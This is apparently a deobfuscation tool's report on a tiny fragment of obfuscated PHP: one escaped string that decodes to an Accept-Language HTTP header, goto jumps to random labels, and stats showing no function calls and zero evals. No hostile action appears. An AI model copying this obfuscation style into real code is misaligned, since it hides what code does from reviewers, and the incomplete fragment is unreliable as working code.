    $ruc3h[] = "\101\143\x63\x65\160\x74\x2d\114\x61\156\147\x75\x61\x67\145\72\40\145\x6e\x2d\125\123\x2c\145\x6e\x3b\161\x3d\x30\x2e\71";
    goto EitVd;
    YPM0c:
  }

Function Calls

None

Variables

None

Stats

MD5 1ee9abe26f64e1930c9564d8afcaea06
Eval Count 0
Decode Time 397 ms